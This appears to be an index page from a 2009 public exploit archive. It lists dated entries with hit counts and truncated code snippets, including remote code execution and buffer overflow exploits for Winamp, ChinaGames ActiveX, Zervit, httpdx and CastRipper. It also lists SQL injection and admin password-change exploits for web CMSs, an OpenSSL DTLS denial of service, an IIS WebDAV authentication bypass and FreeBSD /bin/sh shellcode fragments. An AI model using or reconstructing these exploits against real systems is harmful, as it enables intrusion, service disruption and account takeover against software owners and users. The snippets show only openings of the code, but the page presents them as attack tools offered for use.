|
ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit | Hits:12 |
function test(){ var shellcode = unescape(... | 05/31/2009 |
WebMember 1.0 (formID) Remote SQL Injection Vulnerability | Hits:14 |
================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N... | 05/31/2009 |
Winamp 5.551 MAKI Parsing Integer Overflow PoC | Hits:23 |
/* Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability This is just a simple poc code to show how to exploit the recent MAKI file parsing vulnerability. Tested on :Vista sp1 and Xpsp3 Release Date :May 22 2009 Venders web site :http:/... | 05/27/2009 |
Winamp | Hits:28 |
#usage: python winamp_maki_script.py #Note : I got problem while using this python file under windows,but it works great under ubuntu :p print ************************************************************************** print Winamp = 5.55 ... | 05/27/2009 |
Winamp | Hits:12 |
# Winamp = 5.55 (MAKI script) Universal Integer Overflow Exploit # By: Encrypt3d.M!nd # # Based on: http://milw0rm.com/exploits/8767 # # place mcvcore.maki on \Winamp\Skins\Bento\scripts and run winmap # # NOTE:i've tested this... | 05/27/2009 |
ZaoCMS (user_updated.php) Remote Change Password Exploit | Hits:8 |
form action= http://demo.zaocms.com/admin/modules/Users/user_updated.php method= post onsubmit= return checkForm(this); id=form1 Name=form1 h2 Cod[3] By ThE g0bL!N ZaoCMS Remote Change Password /h2 tittle ThE g0bL!N /tittle ... | 05/27/2009 |
Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC | Hits:89 |
#!/usr/bin/perl # Zervit webserver 0.4 Bof Poc # make it just for fun :s use LWP::Simple; use LWP::UserAgent; if (@ARGV 2) { print( Usage: 0 url port \n ); print( TARGETS are\n ); print( Example: perl 0 127.0.0.1 777 ... | 05/26/2009 |
OpenSSL | Hits:24 |
/* * cve-2009-1378.c * * OpenSSL = 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 * * ... | 05/26/2009 |
ClanWeb 1.4.2 Remote Change Password / Add Admin Exploit | Hits:35 |
=-=-remote change password and add admin xpl-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-= script:ClanWeb 1.4.2 ------------------------------------------------- Author: ahmadbady my site :Coming... | 05/25/2009 |
httpdx | Hits:7 |
#!/usr/bin/python #[*] Usage : httpdx.py [target_ip] # _ _ _ __ _ _ _ #| || | (_) ___ / \ | |__ | | | #| __ | | | (_- | () | | / / |_ _| #|_||_| |_| /__/ \__/ |_\_\ |_| # #[*] Bug : httpdx = 0.5b FTP Server (USER) Remote BOF... | 05/25/2009 |
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability | Hits:23 |
#### # ##### #### # ##### ####### ### ###### ####### ###### ####### ######### ####### ######## ... | 05/23/2009 |
freebsd/x86-64 execve /bin/sh shellcode 34 bytes | Hits:26 |
/* Anderson Eduardo c0d3_z3r0 Hack'n Roll http://anderson.hacknroll.com http://blog.hacknroll.com .section .text .globl _start _start: xor %rcx,%rcx jmp string main: popq %rsi movq %rsi,%rdi pushq %rsi ... | 05/23/2009 |
Java SE Runtime Environment - JRE 6 Update 13 Multiple Vulnerabilities | Hits:8 |
------------------------------------------------------------------------- Java SE Runtime Environment - JRE 6 Update 13 Multiple Vulnerabilities url: http://java.sun.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http:... | 05/21/2009 |
ipsec-tools racoon frag-isakmp Denial of Service PoC | Hits:166 |
/* racoon-isakmp-dos.c * * Copyright (c) 2009 by mu-b@digit-labs.org * * ipsec-tools racoon frag-isakmp DoS POC * by mu-b - Thu Apr 02 2009 * * - Tested on: ipsec-tools-0.7.1 * * - Private Source Code -DO NOT DISTRIBUTE - * http://www... | 05/21/2009 |
CastRipper 2.50.70 (.m3u) Local Buffer Overflow Exploit | Hits:14 |
#!/usr/bin/perl #[+]--------------------------------------------------------------------------------------[+]# # CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit # By [0]x80- [H]4x²0r # hashteck[at]Gmail[dot]com #... | 05/20/2009 |
|